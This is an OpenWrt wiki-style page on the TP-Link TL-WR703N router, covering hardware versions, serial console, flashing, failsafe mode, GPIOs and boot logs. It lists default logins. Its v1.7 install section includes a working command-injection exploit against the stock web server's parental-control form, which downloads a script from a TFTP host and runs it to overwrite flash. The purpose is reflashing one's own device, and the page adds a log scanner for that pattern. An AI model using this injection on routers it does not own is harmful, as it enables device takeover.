
TP-Link TL-WR703N

Pictures

TP-Link TL-WR703N

Clones

Known clones of this device:

Device

Device in OpenWrt Database

These devices are listed in the Table of Hardware:

FIXME: merge this into device database:

Unlike many newer TP-Link devices, there appear to be no hardware differences between the version for the Chinese market and the version for the international market.

Version/Model | Launch Date | OpenWrt Version Supported | Model Specific Notes
v1.0 | August 2011 | Trunk (r28294) | Confirmed working
v1.2 | | Trunk (r29330) | Confirmed working
v1.3 | | Trunk (r29283) | Confirmed working
v1.5 | December 2011 | Trunk | Confirmed working
v1.6 | April 2012 | Trunk (r39757) | Barrier Breaker, trunk (r39757) confirmed working
v1.6(?) | March 2013 (FW build 130318) | BB(14.07) | AA confirmed working, BB too
v1.6(?) | March 2013 (FW build 130321, original FW rel. 37153n) | Trunk(r41336) | AA confirmed working, BB too
v1.6(?) | June 2013 (FW build 130625) | AA(12.09) | AA confirmed working
v1.7 | Dec. 2012 (FW build 121204) | AA(12.09) | AA confirmed working, trunk (r36641) broken
v1.7 | April 2014 (3.17.1 Build 140120 Rel.56593n) | Unsupported | trunk(r40351) not work
v1.7 | April 2014 (3.17.1 Build 140120 Rel.56593n) | Trunk (r45157) | confirmed working, Chaos Calmer, trunk (r45157)

Installation

Review the warnings below before you flash any images!
  1. Please see generic.flashing for a generic description of the OpenWrt installation process.

Building Custom Images

Note: If you've got a modified version of this hardware which has 16MB of flash, then you will not be able to build images larger than 4MB, even though the bootloader will allow you to subsequently utilize all 16MB of flash (i.e. by adding packages after firstboot). See mb_flash_mod for how to solve this problem.

Warnings / Gotchas

Please check the firmware version first, either:

WARNING If you have a V1.7 firmware, SOME OpenWrt trunks (e.g. r36641) will brick your router, unless you have access to the serial console! NEWER TRUNKS will install without issue via tftp and will work fine.

Below is the version of the new bootloader (which disables the LAN port) of a version 1.7 hardware model (bought in December 2012).

root@tpl2:~# grep -a U-Boot /dev/mtd0ro | cut -d'I' -f1	 
U-Boot 1.1.4 (Sep 25 2012 - 09:04:47)	 

For more info visit this forum topic: https://forum.openwrt.org/viewtopic.php?id=40986

Firmware rev.140120 has admin1/admin1 set for web login/password

Power consumption

This router is normally powered via USB at 5V. The voltage regulator inside is unknown, but its input voltage should be between 3.7V and 5.5V, and never above 5.5V: the device will be damaged by voltages that are too high*. Maximum current draw at 5V is 185mA (OpenWrt boot), average current draw with WiFi at 18dBm is 100mA, without WiFi 80mA. Hence the average router power consumption is 0.5W, which is incredibly low.

Power consumption will be higher if a USB device is attached to its USB port!

*Hint: If the router seems to be damaged because of a too high voltage, connect 3.3V _after_ the voltage regulator. This replaces the function of the damaged regulator, and the router works again. Be sure to power 5 volts into the micro-usb port at the same time if you want to have the usb port on the device work. More information and a rough diagram here http://img513.imageshack.us/img513/4295/saai.jpg

Serial console

The serial console connector does not utilise the regular TP-Link pinouts. Two pads labelled TP_OUT and TP_IN are the TX and RX signals. 115200 8n1. You also have to connect your RS232-USB adapter to the 5V pin on the board.

Note that the pads can very easily be lifted. There is slightly more mechanical strength if you can solder to the surface-mount components to which the pads are connected–but this also takes care–your device could easily be destroyed. Make sure that your connection is secured so that tension cannot be applied to the solder points when you connect to an external device.

TL-MR703n login: root
password: 5up

Flashing

v1.6 and older: upload the latest stable version via the web interface (default: 192.168.1.1 / admin / admin). Note that the factory default web interface won't accept a file with a long name. Rename it to openwrt.bin and you won't get a "23002 Error".

v1.7 hardware running 3.17.1 Build 140120 Rel.56593n will reject OpenWrt installation via the web interface; install via tftp instead.

Download latest squashfs-factory.bin for the initial flash. Use a "sysupgrade" file for any future updates if already on openwrt.

To flash from the Chinese web interface, at the present time you would select the last menu item on the left, and then the third submenu item. This initiates a popup with two buttons–the upper right one allows you to browse to find the file you want to flash on your PC, the lower left one initiates the flash.

When you roll over an item on the Chinese web interface, the rollover text will indicate which item you are selecting.

Failsafe mode

When the configuration no longer allows you to log in via any network connection (e.g. lost password), the OpenWrt failsafe mode can be entered via the single "Reset" button on the device. However, in contrast to the generic failsafe instructions, for the TL-WR703N you have to wait for ca. 10 (10-12) seconds before pushing the "Reset" button after powering on the device. If the button is pushed immediately after powering on, the single blue LED will start blinking, supposedly indicating some failsafe firmware recovery mode of the embedded bootloader (not yet discovered how to use it). In this mode, the OpenWrt failsafe is not started. Instead, wait for slightly longer than 10 seconds and, as soon as the LED starts blinking for the first time after powering on the device, push the "Reset" button for ca. 1-2 seconds. Immediately afterwards, the LED will blink rapidly (multiple Hz) and OpenWrt will be in failsafe mode.
- The above didn't work on a Ver 1.6 box running OpenWrt r33312. To get into failsafe mode, power up the device and wait until the LED starts flashing (about 2Hz). Once it starts flashing (within about 4 seconds) then quickly press the button. The LED will then flash much faster and the device will be in failsafe mode.

Back to original image

tftpboot 0x81000000 wr703nv1_cn_3_12_11_up(110926).bin
erase 0x9f020000 +0x3c0000
cp.b 0x81000000 0x9f020000 0x3c0000
bootm 9f020000

Unbrick Tutorial with TFTP and Serial

Internal images

TP-Link TL-WR703N with GPIO and Power Spudger position to open case

On the first image you can see the serial connector labeled TP_IN and TP_OUT on the bottom right. GND is right next to it on the right pin of C55.

The third image shows the placement of the GPIOs, the power rails and some other interesting things.

Hi Res images here : https://plus.google.com/u/0/photos/107211980242732541247/albums/5737162394063705409/5737162392085444242

TFTP Install Necessary on v1.7 hardware

I've set up over 15 of the v1.7 hardware nodes with Chaos Calmer trunk r45157, with some nodes running non-stop for weeks without issue. WiFi, USB and ethernet work great; mostly using the WR703n's to support VirtualHere USB-over-IP services. While this works great for me, this could brick your device: proceed at your own risk.

Huge thanks to Interdev for the original sketch. Below are the specific steps that work beautifully for me.

Create Files

Obtain a static BusyBox binary:

curl https://busybox.net/downloads/binaries/busybox-mips > busybox

Download OpenWrt:

curl https://downloads.openwrt.org/snapshots/trunk/ar71xx/generic/openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin -o openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

Cut the OpenWrt image into 2 parts (this could probably be made faster, or more space-efficient, but I haven't researched details):

dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576

Create a file named "aa", using the following contents. Don't forget to replace 192.168.0.9 with the IP of your tftp server.

cd /tmp
tftp -gl i1 192.168.0.9
tftp -gl i2 192.168.0.9
tftp -gl busybox 192.168.0.9
chmod 755 busybox 
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
reboot -f
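
Added example (not code from the original page): the script below makes the same cut at 1048576 bytes, using one block per read instead of bs=1, then checks that both parts fit the stock firmware's "kernel" and "rootfs" partitions as listed in the factory boot log on this page, and that i1 followed by i2 reproduces the image byte for byte. The function names and the constructed sample image are this example's own; the partition sizes are assumed to match your unit.

```shell
#!/bin/sh
# Added example, not from the original page: split a factory image for the
# two-part write done by "aa" and verify the parts before they are served
# over TFTP. Partition sizes are read off the factory boot log on this page
# (assumption: your unit has the same layout):
#   0x020000-0x120000 "kernel" -> /dev/mtdblock1, 1048576 bytes
#   0x120000-0x3e0000 "rootfs" -> /dev/mtdblock2, 2883584 bytes
KERNEL_SIZE=1048576
ROOTFS_SIZE=2883584

# file_size FILE -> size in bytes with any padding from wc removed
file_size() { echo $(( $(wc -c < "$1") )); }

# split_image IMAGE OUTDIR
# Writes OUTDIR/i1 and OUTDIR/i2. Returns 0 only if the image fits both
# partitions and i1 followed by i2 is byte-identical to IMAGE.
split_image() {
    img=$1
    out=$2
    [ -f "$img" ] || { echo "missing image: $img" >&2; return 1; }
    size=$(file_size "$img")
    if [ "$size" -le "$KERNEL_SIZE" ]; then
        echo "image is $size bytes: nothing left for the rootfs part" >&2
        return 2
    fi
    if [ "$size" -gt $((KERNEL_SIZE + ROOTFS_SIZE)) ]; then
        echo "image is $size bytes: i2 would not fit into mtdblock2" >&2
        return 3
    fi
    # One 1 MiB block per read instead of bs=1: same output, far fewer reads.
    dd if="$img" of="$out/i1" bs="$KERNEL_SIZE" count=1 2>/dev/null || return 4
    dd if="$img" of="$out/i2" bs="$KERNEL_SIZE" skip=1 2>/dev/null || return 4
    [ "$(file_size "$out/i1")" -eq "$KERNEL_SIZE" ] || return 5
    # Reassemble and compare: catches truncated or swapped parts.
    cat "$out/i1" "$out/i2" | cmp -s - "$img" || return 5
    echo "ok: i1=$(file_size "$out/i1") bytes, i2=$(file_size "$out/i2") bytes"
}

# make_sample FILE BYTES: constructed stand-in for a firmware image
# (numbered 8-byte records, so no two 64 KiB blocks are identical).
make_sample() {
    awk -v n=$(( $2 / 8 )) 'BEGIN { for (i = 0; i < n; i++) printf "%07d\n", i }' > "$1"
}

if [ "$#" -ge 1 ]; then
    # Real use: sh split.sh <factory image> [output directory]
    split_image "$1" "${2:-.}"
else
    # No arguments: run on a constructed 3932160-byte sample image.
    demo_dir=$(mktemp -d)
    make_sample "$demo_dir/sample.bin" 3932160
    split_image "$demo_dir/sample.bin" "$demo_dir"
    rm -rf "$demo_dir"
fi
```

A non-zero return code means the parts should not be flashed: 2 and 3 are size problems, 5 is a mismatch between the parts and the image.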

Now you should have 5 files in your TFTP server's folder:

Install OpenWrt

Use the following commands to install OpenWrt on a stock/factory Chinese v1.7 TL-WR703N running 3.17.1 Build 140120. Assuming you have a Linux or BSD-based TFTP server, just run the commands from there. DO NOT POWER OFF EQUIPMENT! INTERRUPTING IT WILL BRICK (and you need a 3.3V serial to revive it).

Again, replace 192.168.0.9 with the IP of your TFTP server, and 192.168.0.100 with the IP assigned to the WR703N.

Each of the following steps is necessary; don't skip them.

Set password to admin42

This is only necessary to complete the OpenWrt install; the password will be reset to the default OpenWrt password upon completion of your install.

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.0.100/'

Enable parental control

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm' 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'

Now, exploit a vulnerability in the stock/factory httpd

The following exploit will run these commands on your WR703N:

cd /tmp ; tftp -gl aa 192.168.0.9; sh aa

DO NOT POWER OFF EQUIPMENT! INTERRUPTING THIS WILL BRICK THE WR703N!

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.0.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'

Wait until the WR703N starts to blink; OpenWrt is now loading. Check your DHCP server, ARP table, or use nmap, to find the IP address. See OpenWrt – First Login for login instructions.
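
Added example (not part of the original page): the request above carries its commands between semicolons in the url_0 to url_2 parameters of ParentCtrlRpm.htm. The script below flags such requests in an HTTP access log by allowing only host-name characters in url_0 to url_7; the log format, the function names and the assumption that these fields normally hold plain domain names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original page. Flags requests to the stock
# firmware's parental-control form whose url_0..url_7 values are not plain
# host names. Assumption: these fields are meant to hold domain names, so
# any other byte (";", "%", "/", "|", ...) is reported.

# scan_parentctrl < access.log
# Prints "<line number><TAB><parameter>" for every offending parameter.
# Exit status follows grep: 0 if something was flagged, 1 if the log is clean.
scan_parentctrl() {
    awk '
    match($0, /\/userRpm\/ParentCtrlRpm\.htm\?[^ "]*/) {
        query = substr($0, RSTART, RLENGTH)
        sub(/^[^?]*\?/, "", query)            # keep only the query string
        n = split(query, pair, "&")
        for (i = 1; i <= n; i++) {
            if (pair[i] !~ /^url_[0-7]=/) continue
            value = substr(pair[i], index(pair[i], "=") + 1)
            # Allow-list: letters, digits, dot and hyphen; empty is fine.
            if (value !~ /^[A-Za-z0-9.-]*$/) {
                printf "%d\t%s\n", NR, pair[i]
                hits++
            }
        }
    }
    END { exit (hits > 0 ? 0 : 1) }'
}

# Constructed sample log in common log format. Line 2 reuses the url_N
# values from the request shown on this page; line 3 is an ordinary rule.
sample_log() {
    cat <<'EOF'
192.168.0.9 - - [01/Jan/2015:10:00:00 +0000] "GET /userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1 HTTP/1.1" 200 512
192.168.0.9 - - [01/Jan/2015:10:00:05 +0000] "GET /userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.0.9;&url_2=;sh%20aa;&url_3=&enable=1&Changed=1 HTTP/1.1" 200 512
192.168.0.9 - - [01/Jan/2015:10:01:00 +0000] "GET /userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&url_0=example.com&url_1=www.example.org&enable=1&Changed=1 HTTP/1.1" 200 512
EOF
}

# Run the check over the constructed sample.
sample_log | scan_parentctrl
```

The same allow-list is the input check a form handler would apply before using these values anywhere near a shell.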

TL-WR703N Reverse Engineering

GPIOs

The AR933x platform provides 30 GPIOs. Some of them are used by the router for status LEDs, buttons and other stuff. The table below shows the results of investigations:

GPIO | Available on WR703N | AR9331 Pin | POR Value | WR703N Name | Description | MR3020 Name
0 | R4-E | A78 | 0 | | Must have 0 value during bootstrap* | WLAN LED/LED4
1 | R2-S | A77 | 1 | | Must have 1 value during bootstrap |
2 | VIA | B49 | | SPI_CS_0 | Used by SPI Flash | SPI_CS_0
3 | VIA | B51 | | SPI_CLK | Used by SPI Flash | SPI_CLK
4 | VIA | A57 | | SPI_MOSI | Used by SPI Flash | SPI_MOSI
5 | R57-S/R60-S | B50 | | SPI_MISO | Used by SPI Flash | SPI_MISO
6 | R16-S | B46 | | LDO | Connected to U6 LDO* | LDO
7 | R15-S | A54 | 0 | | * |
8 | R18-E | A52 | | USB_POWER | Control USB Host Power | USB_POWER
9 | R82-N | B68 | 1 | TP_IN | UART RXD | TP_IN
10 | C55-W | A79 | | TP_OUT | UART TXD | TP_OUT
11 | R92-E | B48 | | RESET SW | Soft Reset Switch | WPS/RESET SW
12 | VIA | A56 | 0 | | Must have 0 value during bootstrap |
13 | R3-S | B66 | 1 | | Must have 0 value during bootstrap |
14 | R11-N | A76 | 0 | | Must have 0 value during bootstrap* |
15 | R12-N | B65 | 0 | | Must have 0 value during bootstrap* |
16 | R13-N | A75 | 0 | | Must have 0 value during bootstrap |
17 | R14-N | B64 | 1 | | | LAN LED/LED5
18 | NC | A28 | N/A | | | SLIDE SW1
19
20 | NC | A27 | N/A | | | SLIDE SW2
21
22
23
24
25
26
27 | LED2-S/LED3-S | B44 | | LED2/LED3 | Blue PCB LED | 3G LED/LED3
28 | VIA | A74 | 0 | | Must have 0 value during bootstrap |
29 | R17-S | A53 | 0 | | |

* on wr703n these can be floating (i.e. resistors removed) and the unit still boots
* on wr703n tried to pull up GPIO14 (after removing R11) with 10K, system won't boot, so let it pull down or floating

PCB details

You can get additional details on the PCB in the dedicated PCB Details Wiki page.

Boot log (OpenWrt)

U-Boot 1.1.4 (Aug 27 2011 - 10:39:39)

AP121-2MB (ar9330) U-boot

DRAM: 32 MB
led turning on for 1s...
id read 0x100000ff
flash size 4194304, sector count = 64
Flash: 4 MB
Using default environment

In: serial
Out: serial
Err: serial
Net: ag7240_enet_initialize...
No valid address in Flash. Using fixed address
No valid address in Flash. Using fixed address
: cfg1 0x5 cfg2 0x7114
eth0: 00:03:7f:09:0b:ad
ag7240_phy_setup
eth0 up
: cfg1 0xf cfg2 0x7214
eth1: 00:03:7f:09:0b:ad
athrs26_reg_init_lan
ATHRS26: resetting s26
ATHRS26: s26 reset done
ag7240_phy_setup
eth1 up
eth0, eth1
Autobooting in 1 seconds
## Booting image at 9f020000 ...
Uncompressing Kernel Image ... OK

Starting kernel ...

Linux version 2.6.39.4 (juhosg@idared) (gcc version 4.5.4 20110808 (prerelease) (Linaro GCC 4.5-2011.08) ) #1 Tue Sep 20 14:44:37 CEST 2011
bootconsole [early0] enabled
CPU revision is: 00019374 (MIPS 24Kc)
SoC: Atheros AR9330 rev 1
Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz
Determined physical RAM map:
memory: 02000000 @ 00000000 (usable)
Initrd not found or empty - disabling initrd
Zone PFN ranges:
Normal 0x00000000 -> 0x00002000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
0: 0x00000000 -> 0x00002000
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 8128
Kernel command line: board=TL-WR703N console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd
PID hash table entries: 128 (order: -3, 512 bytes)
Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 29376k/32768k available (2009k kernel code, 3392k reserved, 386k data, 180k init, 0k highmem)
SLUB: Genslabs=9, HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
NR_IRQS:80
Calibrating delay loop... 265.42 BogoMIPS (lpj=1327104)
pid_max: default: 32768 minimum: 301
Mount-cache hash table entries: 512
NET: Registered protocol family 16
MIPS: machine is TP-LINK TL-WR703N v1
bio: create slab <bio-0> at 0
Switching to clocksource MIPS
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 1024 (order: 1, 8192 bytes)
TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
TCP: Hash tables configured (established 1024 bind 1024)
TCP reno registered
UDP hash table entries: 256 (order: 0, 4096 bytes)
UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
NET: Registered protocol family 1
squashfs: version 4.0 (2009/01/31) Phillip Lougher
JFFS2 version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
msgmni has been set to 57
io scheduler noop registered
io scheduler deadline registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
ar933x-uart: ttyATH0 at MMIO 0x18020000 (irq = 11) is a AR933X UART
console [ttyATH0] enabled, bootconsole disabled
console [ttyATH0] enabled, bootconsole disabled
Atheros AR71xx SPI Controller driver version 0.2.4
m25p80 spi0.0: found s25sl032a, expected m25p80
m25p80 spi0.0: s25sl032a (4096 Kbytes)
Searching for RedBoot partition table in spi0.0 at offset 0x3e0000
Searching for RedBoot partition table in spi0.0 at offset 0x3f0000
No RedBoot partition table detected in spi0.0
spi0.0: no WRT160NL signature found
Creating 5 MTD partitions on "spi0.0":
0x000000000000-0x000000020000 : "u-boot"
0x000000020000-0x000000120000 : "kernel"
0x000000120000-0x0000003f0000 : "rootfs"
mtd: partition "rootfs" set to be root filesystem
mtd: partition "rootfs_data" created automatically, ofs=2A0000, len=150000
0x0000002a0000-0x0000003f0000 : "rootfs_data"
0x0000003f0000-0x000000400000 : "art"
0x000000020000-0x0000003f0000 : "firmware"
ag71xx_mdio: probed
eth0: Atheros AG71xx at 0xb9000000, irq 4
Atheros AR71xx hardware watchdog driver version 0.1.0
TCP westwood registered
NET: Registered protocol family 17
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 180k freed
linput: gpio-keys-polled as /devices/platform/gpio-keys-polled/input/input0
Button Hotplug driver version 0.4.1
- preinit -
Press the [f] key and hit [enter] to enter failsafe mode
eth0: link up (100Mbps/Full duplex)
- regular preinit -
JFFS2 notice: (371) jffs2_build_xattr_subsystem: complete building xattr subsystem, 17 of xdatum (0 unchecked, 16 orphan) and 30 of xref (0 dead, 16 orphan) found.
switching to jffs2
- init -

Please press Enter to activate this console.
eth0: link down
device eth0 entered promiscuous mode
Compat-wireless backport release: compat-wireless-2011-08-25
Backport based on wireless-testing.git master-2011-09-14
cfg80211: Calling CRDA to update world regulatory domain
eth0: link up (100Mbps/Full duplex)
br-lan: port 1(eth0) entering forwarding state
br-lan: port 1(eth0) entering forwarding state
SCSI subsystem initialized
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
cfg80211: World regulatory domain updated:
cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
ieee80211 phy0: Atheros AR9330 Rev:1 mem=0xb8100000, irq=2
cfg80211: Calling CRDA for country: US
PPP generic driver version 2.4.2
ip_tables: (C) 2000-2006 Netfilter Core Team
cfg80211: Regulatory domain changed to country: US
cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm)
cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm)
cfg80211: (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
cfg80211: (5490000 KHz - 5600000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
cfg80211: (5650000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)
NET: Registered protocol family 24
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
ar71xx-ehci ar71xx-ehci: Atheros AR91xx built-in EHCI controller
ar71xx-ehci ar71xx-ehci: new USB bus registered, assigned bus number 1
ar71xx-ehci ar71xx-ehci: irq 3, io mem 0x1b000000
ar71xx-ehci ar71xx-ehci: USB 2.0 started, EHCI 1.00
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
nf_conntrack version 0.5.0 (461 buckets, 1844 max)
usb 1-1: new high speed USB device number 2 using ar71xx-ehci
ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
Initializing USB Mass Storage driver...
scsi0 : usb-storage 1-1:1.0
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
scsi 0:0:0:0: Direct-Access Kingston DataTraveler 2.0 1.00 PQ: 0 ANSI: 2
sd 0:0:0:0: [sda] 7856128 512-byte logical blocks: (4.02 GB/3.74 GiB)
sd 0:0:0:0: [sda] Write Protect is off
sd 0:0:0:0: [sda] Assuming drive cache: write through
sd 0:0:0:0: [sda] Assuming drive cache: write through
sda: sda1
sd 0:0:0:0: [sda] Assuming drive cache: write through
sd 0:0:0:0: [sda] Attached SCSI removable disk



BusyBox v1.18.5 (2011-09-17 19:36:07 CEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 ATTITUDE ADJUSTMENT (bleeding edge, r28258) ----------
  * 1/4 oz Vodka      Pour all ingredients into mixing
  * 1/4 oz Gin        tin with ice, strain into glass.
  * 1/4 oz Amaretto
  * 1/4 oz Triple sec
  * 1/4 oz Peach schnapps
  * 1/4 oz Sour mix
  * 1 splash Cranberry juice
 -----------------------------------------------------
root@OpenWrt:/# cat /proc/cpuinfo
system type : Atheros AR9330 rev 1
machine : TP-LINK TL-WR703N v1
processor : 0
cpu model : MIPS 24Kc V7.4
BogoMIPS : 265.42
wait instruction : yes
microsecond timers : yes
tlb_entries : 16
extra interrupt vector : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented : mips16
shadow register sets : 1
kscratch registers : 0
core : 0
VCED exceptions : not available
VCEI exceptions : not available

root@OpenWrt:/#


Boot log (Factory)

U-Boot 1.1.4 (Aug 27 2011 - 10:39:39)
AP121-2MB (ar9330) U-boot
DRAM: 32 MB
led turning on for 1s...
id read 0x100000ff
flash size 4194304, sector count = 64
Flash: 4 MB
Using default environment
In: serial
Out: serial
Err: serial
Net: ag7240_enet_initialize...
No valid address in Flash. Using fixed address
No valid address in Flash. Using fixed address
: cfg1 0x5 cfg2 0x7114
eth0: 00:03:7f:09:0b:ad
ag7240_phy_setup
eth0 up
: cfg1 0xf cfg2 0x7214
eth1: 00:03:7f:09:0b:ad
athrs26_reg_init_lan
ATHRS26: resetting s26
ATHRS26: s26 reset done
ag7240_phy_setup
eth1 up
eth0, eth1
Autobooting in 1 seconds
## Booting image at 9f020000 ...
Uncompressing Kernel Image ... OK
Starting kernel ...
Booting AR9330(Hornet)...
Linux version 2.6.31--LSDK-9.2.0.312 (root@bogon) (gcc version 4.3.3 (GCC) ) #128 Fri Aug 26 14:58:53 CST 2011
flash_size passed from bootloader = 4
CPU revision is: 00019374 (MIPS 24Kc)
Determined physical RAM map:
memory: 02000000 @ 00000000 (usable)
User-defined physical RAM map:
memory: 02000000 @ 00000000 (usable)
Zone PFN ranges:
Normal 0x00000000 -> 0x00002000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
0: 0x00000000 -> 0x00002000
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 8128
Kernel command line: console=ttyS0,115200 root=31:02 rootfstype=squashfs init=/sbin/init mtdparts=ar7240-nor0:128k(u-boot),1024k(kernel),2816(rootfs),64k(config),64k(ART) mem=32M
PID hash table entries: 128 (order: 7, 512 bytes)
Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 29864k/32768k available (1888k kernel code, 2904k reserved, 524k data, 116k init, 0k highmem)
Hierarchical RCU implementation.
NR_IRQS:128
plat_time_init: plat time init done
Calibrating delay loop... 266.24 BogoMIPS (lpj=532480)
Mount-cache hash table entries: 512
NET: Registered protocol family 16
===== ar7240_platform_init: 0
Whoops! This kernel is for product wr703 v1.0!
bio: create slab <bio-0> at 0
SCSI subsystem initialized
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 1024 (order: 1, 8192 bytes)
TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
TCP: Hash tables configured (established 1024 bind 1024)
TCP reno registered
NET: Registered protocol family 1
AR7240 GPIOC major 0
squashfs: version 4.0 (2009/01/31) Phillip Lougher
NTFS driver 2.1.29 [Flags: R/O].
msgmni has been set to 58
alg: No test for lzma (lzma-generic)
alg: No test for stdrng (krng)
io scheduler noop registered
io scheduler anticipatory registered
io scheduler deadline registered
io scheduler cfq registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
ttyS0: detected caps 00000000 should be 00000100
serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A
console [ttyS0] enabled
PPP generic driver version 2.4.2
NET: Registered protocol family 24
cmdlinepart partition parsing not available
set partition boot
set partition kernel
set partition rootfs
set partition config
set partition art
set partition arching for RedBoot partition table
5 RedBoot partitions found on MTD device ar7240-nor0
Creating 5 MTD partitions on "ar7240-nor0":
0x000000000000-0x000000020000 : "boot"
0x000000020000-0x000000120000 : "kernel"
0x000000120000-0x0000003e0000 : "rootfs"
0x0000003e0000-0x0000003f0000 : "config"
0x0000003f0000-0x000000400000 : "art"
->Oops: flash id 0x10215 .
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
Port Status 1c000004
ar7240-ehci ar7240-ehci.0: ATH EHCI
ar7240-ehci ar7240-ehci.0: new USB bus registered, assigned bus number 1
ehci_reset Intialize USB CONTROLLER in host mode: 3
ehci_reset Port Status 1c000000
ar7240-ehci ar7240-ehci.0: irq 3, io mem 0x1b000000
ehci_reset Intialize USB CONTROLLER in host mode: 3
ehci_reset Port Status 1c000000
ar7240-ehci ar7240-ehci.0: USB 2.0 started, EHCI 1.00
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
TCP cubic registered
NET: Registered protocol family 17
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
ar7240wdt_init: Registering WDT success
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 116k freed
====>slow_led_expire 621: here
===>slow_led_expire 625: off
